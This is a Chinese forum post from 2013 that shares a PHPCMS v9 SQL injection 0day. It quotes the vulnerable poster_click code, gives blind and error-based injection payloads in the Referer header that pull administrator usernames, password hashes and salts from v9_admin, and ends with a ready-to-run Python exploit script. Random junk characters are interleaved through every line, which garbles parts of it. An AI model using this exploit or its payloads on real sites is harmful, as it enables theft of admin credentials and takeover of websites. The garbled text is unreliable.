有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
0 I1 |" X# z8 k0 ^8 N5 H1 ^8 i! ^: B5 k' Q/ o" A' c2 ?6 h+ C
问题函数\phpcms\modules\poster\index.php
. j9 y4 {" z, u" T& }- a5 c: A& n- `( T3 A+ f7 Z- `+ G
public function poster_click() {
2 D& Z" V. F9 @6 u' H$ k3 d$id = isset($_GET['id']) ? intval($_GET['id']) : 0;; [7 a; O) V3 a! i6 ]
$r = $this->db->get_one(array('id'=>$id));6 h% W/ @5 o0 A* f) C" z# C: U
if (!is_array($r) && empty($r)) return false;
, v( b* e# {) Z) y$ip_area = pc_base::load_sys_class('ip_area');/ y5 Z; h( n$ F# C; }3 G, m. l
$ip = ip();
+ U! i+ d; R [ I6 c$ J$area = $ip_area->get($ip);
+ T+ Z% b4 q9 I3 J' d8 n$username = param::get_cookie('username') ? param::get_cookie('username') : '';
# o1 v! Z$ e* C' z, nif($id) {1 F( j7 }' }. l s
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();! W( I: E5 ^) v8 W$ [6 o0 Q( Q
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));( x" ^+ J% W. P/ F- \
} W3 f* n$ E6 I1 d" P: K8 t
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));& ]4 T; ^6 L3 d- E* ^' |
$setting = string2array($r['setting']);
3 a* e7 J& R. u# }8 Nif (count($setting)==1) {
b! R$ x5 l% [& x$url = $setting['1']['linkurl'];# J; C; h+ w, L
} else {
& [- i6 d% j x! Z$ o$ l$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
3 W: t; D7 l/ _ w' ^' n}
: ]& W0 P- _; hheader('Location: '.$url);8 B% w' A9 h S0 V0 W a- m# o
}0 B5 y. y. C" p
5 j0 l) r, |: r / W) b1 T8 f9 ?& R* [+ X2 m
! `( {& i& D- @0 _
利用方式:
$ V0 F* F& @" z% ]: x, k* E) n" X* M& A% }
1、可以采用盲注入的手法:
. t7 i& f( O% A
9 m: L2 g; \- P+ |' Xreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#& w7 ^! w& c" q9 N
4 K1 K Z- _, Q0 R8 w通过返回页面,正常与否一个个猜解密码字段。
* i) D6 v7 f$ N% I- w: q% _1 B9 T6 k0 G+ f, i7 g+ m7 B e8 N' {
2、代码是花开写的,随手附上了:1 \- u2 ]9 Z; }3 } m/ ~2 v0 i
3 q3 _" p* n3 C* \
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#3 B- i" f2 c$ j7 [; Z4 z* a/ B
7 z3 W, {0 |& Q" }. Q
此方法是爆错注入手法,原理自查。0 h9 u% u, V* E4 A* F, v- v3 k
! l6 Y: n/ q$ \& [ 2 D1 T4 ~% K' q! c w4 v
, k" z# |! W, t3 |7 u, `
利用程序:/ |9 ^3 A! y' {! A' }/ P" S
+ r8 j; W6 z, L9 y; r4 {- k
#!/usr/bin/env python: R3 u& L% O7 O+ F! O. H! W3 C
import httplib,sys,re
2 U1 c2 e! T; `; j8 k$ d& h) H! W3 \* I2 M6 V) W
def attack():
& h/ Z1 N) k* H D' Z6 o5 W+ yprint “Code by Pax.Mac Team conqu3r!”
5 h& M! Z' Q2 v- Y8 W, ]print “Welcome to our zone!!!”; s( h0 Z# O% [9 |# a. }
url=sys.argv[1]
2 L1 A+ K) a. \paths=sys.argv[2]
, ^+ L$ O0 B6 C4 ^* b& @conn = httplib.HTTPConnection(url)
8 `/ `6 `" y( _5 K" Wi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,6 ^8 N' C4 t8 O+ Z/ M# v8 i
“Accept”: “text/plain”,1 {; b, t5 x6 G7 i8 M
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}6 o: d, Z6 E2 B
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
! \. `8 T0 r2 _7 r7 ar1 = conn.getresponse(). p5 D% J8 L, n& ^7 i
datas=r1.read()$ q# O6 T; d: x! G3 o& O
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
( s: r' [: v$ }# tprint datas[0]
2 L$ ~- C- g$ R! A0 X0 ]$ |conn.close()
9 B9 V7 y) C8 p! Sif __name__==”__main__”:/ g7 j! x" l$ K+ G
if len(sys.argv)<3:
1 q6 h) M6 ]6 V3 U+ Zprint “Code by Pax.Mac Team conqu3r”( w& b/ R# E: @ T+ g% \* @
print “Usgae:”6 @1 M, \& w) G; q
print “ phpcmsattack.py www.paxmac.org /”
2 B, S8 k( T7 B# ~' mprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
" @$ J3 i- C9 ]4 csys.exit(1)
7 I+ _# F7 p5 V9 d mattack()% s3 t1 q3 l3 ~# e" _+ J; N
3 _. A) q" ?# v6 P
|
发表于 2013-1-11 21:01:00
收藏
支持
反对